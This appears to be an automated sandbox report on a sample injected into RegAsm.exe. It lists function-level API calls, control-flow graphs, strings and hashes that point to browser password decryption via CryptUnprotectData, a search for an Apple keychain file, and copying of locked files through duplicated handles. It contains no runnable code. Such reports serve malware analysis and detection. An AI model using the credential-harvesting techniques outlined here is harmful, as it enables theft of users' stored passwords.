                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1690352074-0
                                                                                                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                  Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                  Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-445580 call 4136c0 4->41 15 4455e5 5->15 16 4455e8-4455f9 5->16 9 445800-445809 6->9 12 445856-44585f 9->12 13 44580b-44581e call 40a889 call 403e2d 9->13 18 445861-445874 call 40a889 call 403c9c 12->18 19 4458ac-4458b5 12->19 43 445823-445826 13->43 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 51 445879-44587c 18->51 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 85 445685 21->85 86 4456b2-4456b5 call 40b1ab 21->86 28 445605-445607 22->28 29 445603 22->29 35 4459f2-4459fa 23->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->36 135 44592d-445945 call 40b6ef 24->135 136 44594a 24->136 28->21 39 445609-44560d 28->39 29->28 45 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->45 46 445b29-445b32 35->46 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 39->21 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 39->49 40->3 64 445585-44558c call 41366b 41->64 52 44584c-445854 call 40b1ab 43->52 53 445828 43->53 182 445b08-445b15 call 40ae51 45->182 54 445c7c-445c85 46->54 55 445b38-445b96 memset * 3 46->55 150 445665-445670 call 40b1ab 49->150 151 445643-445663 call 40a9b5 call 4087b3 49->151 65 4458a2-4458aa call 40b1ab 51->65 66 44587e 51->66 52->12 67 44582e-445847 call 40a9b5 call 4087b3 53->67 61 445d1c-445d25 54->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->68 69 445b98-445ba0 55->69 74 445fae-445fb2 61->74 75 445d2b-445d3b 61->75 168 445cf5 62->168 169 445cfc-445d03 62->169 64->40 65->19 83 445884-44589d call 40a9b5 call 4087b3 66->83 138 445849 67->138 249 445c77 68->249 69->68 84 445ba2-445bcf call 4099c6 call 445403 call 445389 69->84 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 75->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 75->94 156 44589f 83->156 84->54 103 44568b-4456a4 call 40a9b5 call 4087b3 85->103 105 4456ba-4456c4 86->105 162 445d67-445d6c 93->162 163 445d71-445d83 call 445093 93->163 196 445e17 94->196 197 445e1e-445e25 94->197 158 4456a9-4456b0 103->158 118 4457f9 105->118 119 4456ca-4456d3 call 413cfa call 413d4c 105->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->23 138->52 150->105 151->150 153->154 154->35 156->65 158->86 158->103 174 445fa1-445fa9 call 40b6ef 162->174 163->74 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->74 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->46 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 243 445e62-445e69 202->243 244 445e5b 202->244 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->9 218->74 253 445f9b 218->253 219->182 243->203 246 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 243->246 244->243 264 445f4d-445f5a call 40ae51 246->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                  • API String ID: 2334598624-3798722523
                                                                                                                                                                                                  • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                  Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                  • API String ID: 1442760552-28296030
                                                                                                                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                  Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                  • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                  • String ID: chp$v10
                                                                                                                                                                                                  • API String ID: 229402216-2783969131
                                                                                                                                                                                                  • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                                  Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 520 413e79-413eae call 413959 call 413ca4 CloseHandle 512->520 521 413e28-413e35 512->521 515 413ec8-413eda call 4099f4 513->515 516 413ebf-413ec6 free 513->516 518 413edb-413ee2 515->518 516->518 522 413ee4 518->522 523 413ee7-413efe 518->523 520->511 526 413e61-413e68 521->526 527 413e37-413e44 GetModuleHandleW 521->527 522->523 523->508 526->520 528 413e6a-413e77 QueryFullProcessImageNameW 526->528 527->526 530 413e46-413e5c 527->530 528->520 530->526
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                                                                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                  • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                                                                                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                                                                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                  • API String ID: 3957639419-1740548384
                                                                                                                                                                                                  • Opcode ID: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                                                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                  Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                  • String ID: bhv
                                                                                                                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                  Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 569 446747-44674b 567->569 570 446728-44672d 567->570 577 4467ac-4467b7 __setusermatherr 568->577 578 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->578 569->566 573 44674d-44674f 569->573 570->566 572 446734-44673b 570->572 572->566 575 44673d-446745 572->575 576 446755-446758 573->576 575->576 576->568 577->578 581 446810-446819 578->581 582 44681e-446825 578->582 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 586 446834-446838 584->586 587 44683a-44683e 584->587 589 446845-44684b 585->589 590 446872-446877 585->590 586->584 586->587 587->589 591 446840-446842 587->591 593 446853-446864 GetStartupInfoW 589->593 594 44684d-446851 589->594 590->585 591->589 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                                                                                                                                                                  • __set_app_type.MSVCRT ref: 00446762
                                                                                                                                                                                                  • __p__fmode.MSVCRT ref: 00446777
                                                                                                                                                                                                  • __p__commode.MSVCRT ref: 00446785
                                                                                                                                                                                                  • __setusermatherr.MSVCRT ref: 004467B1
                                                                                                                                                                                                  • _initterm.MSVCRT ref: 004467C7
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                                                                                                                                                                  • _initterm.MSVCRT ref: 004467FD
                                                                                                                                                                                                  • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                                                                                                                                                                  • exit.MSVCRT ref: 00446897
                                                                                                                                                                                                  • _cexit.MSVCRT ref: 0044689D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2791496988-0
                                                                                                                                                                                                  • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                                                                                  Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
